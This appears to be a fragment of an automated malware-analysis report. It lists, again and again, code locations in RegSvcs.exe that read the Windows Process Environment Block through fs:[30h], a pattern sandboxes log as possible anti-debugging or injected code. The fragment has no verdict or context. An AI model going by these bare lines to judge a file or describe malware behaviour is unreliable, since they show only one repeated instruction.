Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01020274 mov eax, dword ptr fs:[00000030h] 8_2_01020274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01020274 mov eax, dword ptr fs:[00000030h] 8_2_01020274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01020274 mov eax, dword ptr fs:[00000030h] 8_2_01020274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01020274 mov eax, dword ptr fs:[00000030h] 8_2_01020274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9438F mov eax, dword ptr fs:[00000030h] 8_2_00F9438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9438F mov eax, dword ptr fs:[00000030h] 8_2_00F9438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6E388 mov eax, dword ptr fs:[00000030h] 8_2_00F6E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6E388 mov eax, dword ptr fs:[00000030h] 8_2_00F6E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6E388 mov eax, dword ptr fs:[00000030h] 8_2_00F6E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010062A0 mov eax, dword ptr fs:[00000030h] 8_2_010062A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010062A0 mov ecx, dword ptr fs:[00000030h] 8_2_010062A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010062A0 mov eax, dword ptr fs:[00000030h] 8_2_010062A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010062A0 mov eax, dword ptr fs:[00000030h] 8_2_010062A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010062A0 mov eax, dword ptr fs:[00000030h] 8_2_010062A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010062A0 mov eax, dword ptr fs:[00000030h] 8_2_010062A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF035C mov eax, dword ptr fs:[00000030h] 8_2_00FF035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF035C mov eax, dword ptr fs:[00000030h] 8_2_00FF035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF035C mov eax, dword ptr fs:[00000030h] 8_2_00FF035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF035C mov ecx, dword ptr fs:[00000030h] 8_2_00FF035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF035C mov eax, dword ptr fs:[00000030h] 8_2_00FF035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF035C mov eax, dword ptr fs:[00000030h] 8_2_00FF035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF2349 mov eax, dword ptr fs:[00000030h] 8_2_00FF2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF2349 mov eax, dword ptr fs:[00000030h] 8_2_00FF2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF2349 mov eax, dword ptr fs:[00000030h] 8_2_00FF2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF2349 mov eax, dword ptr fs:[00000030h] 8_2_00FF2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF2349 mov eax, dword ptr fs:[00000030h] 8_2_00FF2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF2349 mov eax, dword ptr fs:[00000030h] 8_2_00FF2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF2349 mov eax, dword ptr fs:[00000030h] 8_2_00FF2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF2349 mov eax, dword ptr fs:[00000030h] 8_2_00FF2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF2349 mov eax, dword ptr fs:[00000030h] 8_2_00FF2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF2349 mov eax, dword ptr fs:[00000030h] 8_2_00FF2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF2349 mov eax, dword ptr fs:[00000030h] 8_2_00FF2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF2349 mov eax, dword ptr fs:[00000030h] 8_2_00FF2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF2349 mov eax, dword ptr fs:[00000030h] 8_2_00FF2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF2349 mov eax, dword ptr fs:[00000030h] 8_2_00FF2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF2349 mov eax, dword ptr fs:[00000030h] 8_2_00FF2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010462D6 mov eax, dword ptr fs:[00000030h] 8_2_010462D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F72324 mov eax, dword ptr fs:[00000030h] 8_2_00F72324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6C310 mov ecx, dword ptr fs:[00000030h] 8_2_00F6C310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F90310 mov ecx, dword ptr fs:[00000030h] 8_2_00F90310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAA30B mov eax, dword ptr fs:[00000030h] 8_2_00FAA30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAA30B mov eax, dword ptr fs:[00000030h] 8_2_00FAA30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAA30B mov eax, dword ptr fs:[00000030h] 8_2_00FAA30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01006500 mov eax, dword ptr fs:[00000030h] 8_2_01006500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01044500 mov eax, dword ptr fs:[00000030h] 8_2_01044500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01044500 mov eax, dword ptr fs:[00000030h] 8_2_01044500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01044500 mov eax, dword ptr fs:[00000030h] 8_2_01044500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01044500 mov eax, dword ptr fs:[00000030h] 8_2_01044500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01044500 mov eax, dword ptr fs:[00000030h] 8_2_01044500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01044500 mov eax, dword ptr fs:[00000030h] 8_2_01044500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01044500 mov eax, dword ptr fs:[00000030h] 8_2_01044500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F704E5 mov ecx, dword ptr fs:[00000030h] 8_2_00F704E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA44B0 mov ecx, dword ptr fs:[00000030h] 8_2_00FA44B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FFA4B0 mov eax, dword ptr fs:[00000030h] 8_2_00FFA4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F764AB mov eax, dword ptr fs:[00000030h] 8_2_00F764AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F76484 mov eax, dword ptr fs:[00000030h] 8_2_00F76484
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9A470 mov eax, dword ptr fs:[00000030h] 8_2_00F9A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9A470 mov eax, dword ptr fs:[00000030h] 8_2_00F9A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9A470 mov eax, dword ptr fs:[00000030h] 8_2_00F9A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FFC460 mov ecx, dword ptr fs:[00000030h] 8_2_00FFC460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9245A mov eax, dword ptr fs:[00000030h] 8_2_00F9245A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6645D mov eax, dword ptr fs:[00000030h] 8_2_00F6645D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAE443 mov eax, dword ptr fs:[00000030h] 8_2_00FAE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAE443 mov eax, dword ptr fs:[00000030h] 8_2_00FAE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAE443 mov eax, dword ptr fs:[00000030h] 8_2_00FAE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAE443 mov eax, dword ptr fs:[00000030h] 8_2_00FAE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAE443 mov eax, dword ptr fs:[00000030h] 8_2_00FAE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAE443 mov eax, dword ptr fs:[00000030h] 8_2_00FAE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAE443 mov eax, dword ptr fs:[00000030h] 8_2_00FAE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAE443 mov eax, dword ptr fs:[00000030h] 8_2_00FAE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6C427 mov eax, dword ptr fs:[00000030h] 8_2_00F6C427
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6E420 mov eax, dword ptr fs:[00000030h] 8_2_00F6E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6E420 mov eax, dword ptr fs:[00000030h] 8_2_00F6E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6E420 mov eax, dword ptr fs:[00000030h] 8_2_00F6E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF6420 mov eax, dword ptr fs:[00000030h] 8_2_00FF6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF6420 mov eax, dword ptr fs:[00000030h] 8_2_00FF6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF6420 mov eax, dword ptr fs:[00000030h] 8_2_00FF6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF6420 mov eax, dword ptr fs:[00000030h] 8_2_00FF6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF6420 mov eax, dword ptr fs:[00000030h] 8_2_00FF6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF6420 mov eax, dword ptr fs:[00000030h] 8_2_00FF6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF6420 mov eax, dword ptr fs:[00000030h] 8_2_00FF6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA8402 mov eax, dword ptr fs:[00000030h] 8_2_00FA8402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA8402 mov eax, dword ptr fs:[00000030h] 8_2_00FA8402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA8402 mov eax, dword ptr fs:[00000030h] 8_2_00FA8402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F725E0 mov eax, dword ptr fs:[00000030h] 8_2_00F725E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAC5ED mov eax, dword ptr fs:[00000030h] 8_2_00FAC5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAC5ED mov eax, dword ptr fs:[00000030h] 8_2_00FAC5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9E5E7 mov eax, dword ptr fs:[00000030h] 8_2_00F9E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9E5E7 mov eax, dword ptr fs:[00000030h] 8_2_00F9E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9E5E7 mov eax, dword ptr fs:[00000030h] 8_2_00F9E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9E5E7 mov eax, dword ptr fs:[00000030h] 8_2_00F9E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9E5E7 mov eax, dword ptr fs:[00000030h] 8_2_00F9E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9E5E7 mov eax, dword ptr fs:[00000030h] 8_2_00F9E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9E5E7 mov eax, dword ptr fs:[00000030h] 8_2_00F9E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9E5E7 mov eax, dword ptr fs:[00000030h] 8_2_00F9E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F765D0 mov eax, dword ptr fs:[00000030h] 8_2_00F765D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAA5D0 mov eax, dword ptr fs:[00000030h] 8_2_00FAA5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAA5D0 mov eax, dword ptr fs:[00000030h] 8_2_00FAA5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAE5CF mov eax, dword ptr fs:[00000030h] 8_2_00FAE5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAE5CF mov eax, dword ptr fs:[00000030h] 8_2_00FAE5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F945B1 mov eax, dword ptr fs:[00000030h] 8_2_00F945B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F945B1 mov eax, dword ptr fs:[00000030h] 8_2_00F945B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0102A456 mov eax, dword ptr fs:[00000030h] 8_2_0102A456
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF05A7 mov eax, dword ptr fs:[00000030h] 8_2_00FF05A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF05A7 mov eax, dword ptr fs:[00000030h] 8_2_00FF05A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF05A7 mov eax, dword ptr fs:[00000030h] 8_2_00FF05A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAE59C mov eax, dword ptr fs:[00000030h] 8_2_00FAE59C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA4588 mov eax, dword ptr fs:[00000030h] 8_2_00FA4588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F72582 mov eax, dword ptr fs:[00000030h] 8_2_00F72582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F72582 mov ecx, dword ptr fs:[00000030h] 8_2_00F72582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6A580 mov ecx, dword ptr fs:[00000030h] 8_2_00F6A580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6A580 mov eax, dword ptr fs:[00000030h] 8_2_00F6A580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA656A mov eax, dword ptr fs:[00000030h] 8_2_00FA656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA656A mov eax, dword ptr fs:[00000030h] 8_2_00FA656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA656A mov eax, dword ptr fs:[00000030h] 8_2_00FA656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0102A49A mov eax, dword ptr fs:[00000030h] 8_2_0102A49A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F78550 mov eax, dword ptr fs:[00000030h] 8_2_00F78550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F78550 mov eax, dword ptr fs:[00000030h] 8_2_00F78550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9E53E mov eax, dword ptr fs:[00000030h] 8_2_00F9E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9E53E mov eax, dword ptr fs:[00000030h] 8_2_00F9E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9E53E mov eax, dword ptr fs:[00000030h] 8_2_00F9E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9E53E mov eax, dword ptr fs:[00000030h] 8_2_00F9E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9E53E mov eax, dword ptr fs:[00000030h] 8_2_00F9E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80535 mov eax, dword ptr fs:[00000030h] 8_2_00F80535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80535 mov eax, dword ptr fs:[00000030h] 8_2_00F80535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80535 mov eax, dword ptr fs:[00000030h] 8_2_00F80535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80535 mov eax, dword ptr fs:[00000030h] 8_2_00F80535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80535 mov eax, dword ptr fs:[00000030h] 8_2_00F80535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80535 mov eax, dword ptr fs:[00000030h] 8_2_00F80535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FEE6F2 mov eax, dword ptr fs:[00000030h] 8_2_00FEE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FEE6F2 mov eax, dword ptr fs:[00000030h] 8_2_00FEE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FEE6F2 mov eax, dword ptr fs:[00000030h] 8_2_00FEE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FEE6F2 mov eax, dword ptr fs:[00000030h] 8_2_00FEE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF06F1 mov eax, dword ptr fs:[00000030h] 8_2_00FF06F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF06F1 mov eax, dword ptr fs:[00000030h] 8_2_00FF06F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAA6C7 mov ebx, dword ptr fs:[00000030h] 8_2_00FAA6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAA6C7 mov eax, dword ptr fs:[00000030h] 8_2_00FAA6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA66B0 mov eax, dword ptr fs:[00000030h] 8_2_00FA66B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAC6A6 mov eax, dword ptr fs:[00000030h] 8_2_00FAC6A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F74690 mov eax, dword ptr fs:[00000030h] 8_2_00F74690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F74690 mov eax, dword ptr fs:[00000030h] 8_2_00F74690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA2674 mov eax, dword ptr fs:[00000030h] 8_2_00FA2674
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101678E mov eax, dword ptr fs:[00000030h] 8_2_0101678E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAA660 mov eax, dword ptr fs:[00000030h] 8_2_00FAA660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAA660 mov eax, dword ptr fs:[00000030h] 8_2_00FAA660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010247A0 mov eax, dword ptr fs:[00000030h] 8_2_010247A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F8C640 mov eax, dword ptr fs:[00000030h] 8_2_00F8C640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA6620 mov eax, dword ptr fs:[00000030h] 8_2_00FA6620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA8620 mov eax, dword ptr fs:[00000030h] 8_2_00FA8620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7262C mov eax, dword ptr fs:[00000030h] 8_2_00F7262C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F8E627 mov eax, dword ptr fs:[00000030h] 8_2_00F8E627
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2619 mov eax, dword ptr fs:[00000030h] 8_2_00FB2619
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F8260B mov eax, dword ptr fs:[00000030h] 8_2_00F8260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F8260B mov eax, dword ptr fs:[00000030h] 8_2_00F8260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F8260B mov eax, dword ptr fs:[00000030h] 8_2_00F8260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F8260B mov eax, dword ptr fs:[00000030h] 8_2_00F8260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F8260B mov eax, dword ptr fs:[00000030h] 8_2_00F8260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F8260B mov eax, dword ptr fs:[00000030h] 8_2_00F8260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F8260B mov eax, dword ptr fs:[00000030h] 8_2_00F8260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FEE609 mov eax, dword ptr fs:[00000030h] 8_2_00FEE609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F747FB mov eax, dword ptr fs:[00000030h] 8_2_00F747FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F747FB mov eax, dword ptr fs:[00000030h] 8_2_00F747FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F927ED mov eax, dword ptr fs:[00000030h] 8_2_00F927ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F927ED mov eax, dword ptr fs:[00000030h] 8_2_00F927ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F927ED mov eax, dword ptr fs:[00000030h] 8_2_00F927ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FFE7E1 mov eax, dword ptr fs:[00000030h] 8_2_00FFE7E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7C7C0 mov eax, dword ptr fs:[00000030h] 8_2_00F7C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF07C3 mov eax, dword ptr fs:[00000030h] 8_2_00FF07C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F707AF mov eax, dword ptr fs:[00000030h] 8_2_00F707AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0103866E mov eax, dword ptr fs:[00000030h] 8_2_0103866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0103866E mov eax, dword ptr fs:[00000030h] 8_2_0103866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F78770 mov eax, dword ptr fs:[00000030h] 8_2_00F78770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80770 mov eax, dword ptr fs:[00000030h] 8_2_00F80770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80770 mov eax, dword ptr fs:[00000030h] 8_2_00F80770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80770 mov eax, dword ptr fs:[00000030h] 8_2_00F80770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80770 mov eax, dword ptr fs:[00000030h] 8_2_00F80770
